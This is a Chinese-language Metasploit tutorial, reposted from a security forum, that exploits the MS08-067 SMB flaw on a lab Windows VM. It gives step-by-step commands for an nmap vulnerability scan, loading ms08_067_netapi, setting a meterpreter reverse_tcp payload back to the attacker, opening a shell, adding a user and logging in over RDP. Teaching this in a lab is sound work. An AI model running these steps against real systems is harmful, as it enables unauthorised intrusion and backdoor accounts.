美文网首页
玩转Metasploit第一节]Ms08_067_netapi利

玩转Metasploit第一节]Ms08_067_netapi利

作者: 池寒 | 来源:发表于2016-08-19 19:59 被阅读3202次

    来源:http://bbs.ichunqiu.com/thread-10369-1-1.html?from=ch

    社区:I春秋

    作者:X_Al3r

    00x01

    #[玩转Metasplot第一节]

    Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限

    But,许多书上已经说过了,为此我也不多介绍了

    推荐书籍:Metasploit魔鬼训练营等,虽老但入门非常有用

    00x02

    在使用Metasploit之前我们需要连接上postgresql数据库

    具体操作看帖子:[AnaLyz3r]Linux kali的魅力--Nmap与Metasploit中的Metasploit部分

    攻击者ip:192.168.1.124

    被攻击ip:192.168.1.125

    使用工具:Nmap,msfconsole,

    利用的攻击载荷:Ms08_067_netapi

    利用的payload:windows/meterpreter/reverse_tcp

    00x03

    #开始使用

    1:打开metasploit中的msfconsole框架

    命令:

    msfconsole

    复制代码

    当然,打开metasploit之前需要连接上postgresql

    命令:

    service postgresql statr

    复制代码

    2:寻找与加载Ms08_067模块

    如果你无法记住ms08_067_netapi的路径的话可以使用search这个搜索命令

    命令:

    search ms08_067_netapi

    复制代码

    搜索ms08_067_netapi路径

    可以看见,已经搜索出ms08_067_netapi的路径

    我们使用use 来加载这个模块

    加载成功

    3:设置模块中的参数与加载一枚payload

    首先我们可以使用show options 来查看所需要设置的参数

    先添加RHOST中的参数

    命令:

    set RHOST 被攻击者ip

    复制代码

    我们在来加载一枚payload

    命令:

    set payload windows/meterpreter/reverse_tcp

    复制代码

    加载成功,我们先使用show options命令来查看需要设置的参数

    命令:

    set LHOST 攻击者ip

    复制代码

    OK,设置完成后我们使用命令开始攻击

    命令:

    exploit

    复制代码

    成功攻击会反弹一个meterpreter就表示攻击成功,我们输入命令

    shell

    复制代码

    就可以调用系统的cmd了,例如进行一个提权等看演示

    可以看见,这是当前用户

    创建并添加成功- -# 因为我已经打开了3389,直接mstsc /admin登录

    00x04

    ##Nmap辅助

    可能你们很好奇,为什么没有出现nmap,他的纯在有什么意义。

    首先,在利用ms08_067_netapi之前我们是不知道他存在这个漏洞的我们需要使用nmap扫出来

    在msf下使用命令:

    nmap --script=vuln 192.168.1.125

    复制代码

    得出结果

    Starting Nmap 7.01 ( [url]https://nmap.org[/url] ) at 2016-08-19 00:14 CST

    Nmap scan report for 192.168.1.125

    Host is up (0.0010s latency).

    Not shown: 994 closed ports

    PORT     STATE SERVICE

    135/tcp  open  msrpc

    139/tcp  open  netbios-ssn

    445/tcp  open  microsoft-ds

    1025/tcp open  NFS-or-IIS

    3389/tcp open  ms-wbt-server

    5000/tcp open  upnp

    MAC Address: 00:0C:29:8E:0F:E9 (VMware)

    Host script results:

    | smb-vuln-cve2009-3103:

    |   VULNERABLE:

    |   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)

    |     State: VULNERABLE

    |     IDs:  CVE:CVE-2009-3103

    |           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,

    |           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a

    |           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE

    |           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,

    |           aka "SMBv2 Negotiation Vulnerability."

    |

    |     Disclosure date: 2009-09-08

    |     References:

    |       [url]http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103[/url]

    |_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103[/url]

    | smb-vuln-ms08-067:

    |   VULNERABLE:

    |   Microsoft Windows system vulnerable to remote code execution (MS08-067)

    |     State: VULNERABLE

    |     IDs:  CVE:CVE-2008-4250

    |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

    |           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

    |           code via a crafted RPC request that triggers the overflow during path canonicalization.

    |

    |     Disclosure date: 2008-10-23

    |     References:

    |       [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250[/url]

    |_      [url]https://technet.microsoft.com/en-us/library/security/ms08-067.aspx[/url]

    |_smb-vuln-ms10-054: false

    |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

    Nmap done: 1 IP address (1 host up) scanned in 16.14 seconds

    复制代码

    可以看见nmap已经扫出来了,为什么nmap会扫这些漏洞呢??

    因为命令中vuln负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

    所以他可以扫出漏洞,然后在使用metasploit寻找指定的exploit

    总结#

    1:可以先使用nmap进行一个简单的漏洞扫描,如果存在系统漏洞等可以在使用msf中的模块进行溢出

    2:耐心,耐心,耐心

    相关文章

      网友评论

          本文标题:玩转Metasploit第一节]Ms08_067_netapi利

          本文链接:https://www.haomeiwen.com/subject/migbsttx.html